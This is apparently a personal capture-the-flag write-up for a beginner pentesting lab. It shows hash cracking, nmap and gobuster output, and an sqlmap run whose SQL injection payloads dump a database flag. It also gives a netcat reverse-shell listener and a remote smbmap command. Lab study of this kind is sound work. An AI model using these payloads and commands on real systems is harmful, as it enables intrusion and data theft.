Crash course pentesting
This is a guided room as it seems so I wont say much here this is more an introduction to various pentesting tools the interesting part is the final exam folder (check the bottom of this writeup)
Gobuster
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/secret (Status: 301) [Size: 313] [--> http://10.10.191.25/secret/]
/server-status (Status: 403) [Size: 277]
/index.html (Status: 200) [Size: 11321]
/password.xxa (Status: 200) [Size: 12]
Hashcat
$hashcat -m 0 '56ab24c15b72a457069c5ea42fcfc640' /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-6400T CPU @ 2.20GHz, 2883/2947 MB (1024 MB allocatable), 2MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 64 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs
56ab24c15b72a457069c5ea42fcfc640:happy
Session..........: hashcat
Status...........: Cracked
Hash.Name........: MD5
Hash.Target......: 56ab24c15b72a457069c5ea42fcfc640
Time.Started.....: Sat Nov 6 21:25:47 2021 (4 secs)
Time.Estimated...: Sat Nov 6 21:25:51 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 599 H/s (0.27ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 2048/14344385 (0.01%)
Rejected.........: 0/2048 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> lovers1
hashcat -m 900 '4bc9ae2b9236c2ad02d81491dcb51d5f' /usr/share/wordlists/rockyou.txt
4bc9ae2b9236c2ad02d81491dcb51d5f:nootnoot
Impacket
Oh yes I know those A very useful scripts collection Especially for windows
John the ripper
Another legendary tool If you cracked passwords on linux you know john the ripper or if you were in the past victorian England too…but not in the nice way
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 '/home/nair0lf32/Desktop/Stuff/THM/Crash Course Pentesting/hashes.txt'
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
hello (?)
1g 0:00:00:00 DONE (2021-11-06 21:59) 1.388g/s 533.3p/s 533.3c/s 533.3C/s 123456..michael1
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-SHA1 '/home/nair0lf32/Desktop/Stuff/THM/Crash Course Pentesting/hashes.txt'
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
password (?)
1g 0:00:00:00 DONE (2021-11-06 22:00) 1.666g/s 13.33p/s 13.33c/s 13.33C/s 123456..rockyou
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
Metasploit
The tool, the myth, the legend Exploitation made easy The one-tool-army The GOAT The best in industry haha…you get the point
Netcat
Basically does two things (as far as I can tell) Banner grabbing
echo " " | nc ip_address service_port
Listen for connections (good for reverse shells and file transfers)
nc -lvnp chosen_port
Nikto
Adding nikto to enumeration process can be valuable A great “vulnerability scanner”
nmap
Another legend..but this one is getting a bit old some faster tools based on it like rustscan are way faster I still start all my enumerations with nmap though there is not a single standard way to scan with nmap and I like that
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-06 19:22 WAT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:22
Completed NSE at 19:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:22
Completed NSE at 19:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:22
Completed NSE at 19:22, 0.00s elapsed
Initiating Ping Scan at 19:22
Scanning 10.10.191.25 [2 ports]
Completed Ping Scan at 19:22, 0.15s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:22
Completed Parallel DNS resolution of 1 host. at 19:22, 0.03s elapsed
Initiating Connect Scan at 19:22
Scanning 10.10.191.25 [1000 ports]
Discovered open port 80/tcp on 10.10.191.25
Increasing send delay for 10.10.191.25 from 0 to 5 due to 11 out of 35 dropped probes since last increase.
Connect Scan Timing: About 25.77% done; ETC: 19:24 (0:01:29 remaining)
Connect Scan Timing: About 33.90% done; ETC: 19:25 (0:01:59 remaining)
Connect Scan Timing: About 48.94% done; ETC: 19:25 (0:01:35 remaining)
Connect Scan Timing: About 69.82% done; ETC: 19:24 (0:00:52 remaining)
Completed Connect Scan at 19:25, 186.50s elapsed (1000 total ports)
Initiating Service scan at 19:25
Scanning 1 service on 10.10.191.25
Completed Service scan at 19:25, 6.33s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.191.25.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 6.73s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.56s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Nmap scan report for 10.10.191.25
Host is up, received syn-ack (1.4s latency).
Scanned at 2021-11-06 19:22:03 WAT for 200s
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:25
Completed NSE at 19:25, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.77 seconds
Smbclient
we use that alot already if samba is open enumerate the shares
Smbmap
smbmap -u admin -p password -h 10.10.10.10 -x “ipconfig”
Sqlmap
sql injecton is too hard for you? or you are just “too good” to try and craft a contextual payload everytime? Is trial and error your worst nighmare? Is that time-based sqli vulneraility taking too long for you? then we got something for you. Automate the boring stuff (kek) with sqlmap.
look How we effortlessly identify and exploit SQL injection vulnerabilities in this form
sqlmap -u http://10.10.145.151/ --forms -b
---
Parameter: msg (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: msg=auFb' RLIKE (SELECT (CASE WHEN (1109=1109) THEN 0x61754662 ELSE 0x28 END))-- GJgv
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: msg=auFb' AND GTID_SUBSET(CONCAT(0x71787a7671,(SELECT (ELT(7550=7550,1))),0x7171627671),7550)-- aFqL
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: msg=auFb' AND (SELECT 6882 FROM (SELECT(SLEEP(5)))Rgtr)-- NjzB
---
[00:05:38] [INFO] the back-end DBMS is MySQL
[00:05:38] [INFO] fetching banner
[00:05:38] [WARNING] reflective value(s) found and filtering out
[00:05:38] [INFO] retrieved: '5.7.28-0ubuntu0.16.04.2'
web server operating system: Linux Ubuntu
web application technology: PHP 7.0.33
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.6
banner: '5.7.28-0ubuntu0.16.04.2'
[00:07:25] [INFO] fetching current user
[00:07:25] [WARNING] reflective value(s) found and filtering out
[00:07:25] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'
[00:08:07] [INFO] fetching current database
[00:08:07] [WARNING] reflective value(s) found and filtering out
[00:08:07] [INFO] retrieved: 'tests'
current database: 'tests'
sqlmap -u http://10.10.145.151/ --forms -D tests --dump
[00:11:02] [INFO] fetching tables for database: 'tests'
[00:11:02] [INFO] resumed: 'lol'
[00:11:02] [INFO] resumed: 'msg'
[00:11:03] [INFO] fetching columns for table 'msg' in database 'tests'
[00:11:03] [WARNING] reflective value(s) found and filtering out
[00:11:03] [INFO] retrieved: 'msg'
[00:11:03] [INFO] retrieved: 'varchar(100)'
[00:11:03] [INFO] fetching entries for table 'msg' in database 'tests'
[00:11:03] [INFO] retrieved: 'msg'
[00:11:03] [INFO] retrieved: 'test'
Database: tests
Table: msg
[2 entries]
+------+
| msg |
+------+
| msg |
| test |
+------+
[00:11:04] [INFO] table 'tests.msg' dumped to CSV file '/home/ya_homie/.local/share/sqlmap/output/10.10.145.151/dump/tests/msg.csv'
[00:11:04] [INFO] fetching columns for table 'lol' in database 'tests'
[00:11:04] [INFO] retrieved: 'flag'
[00:11:05] [INFO] retrieved: 'varchar(100)'
[00:11:05] [INFO] fetching entries for table 'lol' in database 'tests'
[00:11:05] [INFO] retrieved: 'found_me'
Database: tests
Table: lol
[1 entry]
+----------+
| flag |
+----------+
| found_me |
+----------+
Post Exploitation
“I am in..now what?''
Here little skiddy have those handy
General:
https://github.com/swisskyrepo/PayloadsAllTheThings (A bunch of tools and payloads for every stage of pentesting)
Linux:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ (a bit old but still worth looking at)
https://github.com/rebootuser/LinEnum (One of the most popular priv esc scripts)
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh (Another popular script)
https://github.com/mzet-/linux-exploit-suggester (A Script that’s dedicated to searching for kernel exploits)
https://gtfobins.github.io (I can not overstate the usefulness of this for priv esc, if a common binary has special permissions, you can use this site to see how to get root perms with it.)
Windows:
https://www.fuzzysecurity.com/tutorials/16.html (Dictates some very useful commands and methods to enumerate the host and gain intel)
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp (A bit old but still an incredibly useful script)
https://github.com/411Hall/JAWS (A general enumeration script)
Final exam
Click to check the solution to the Final Exam (flags are on me today, so spoiler alert)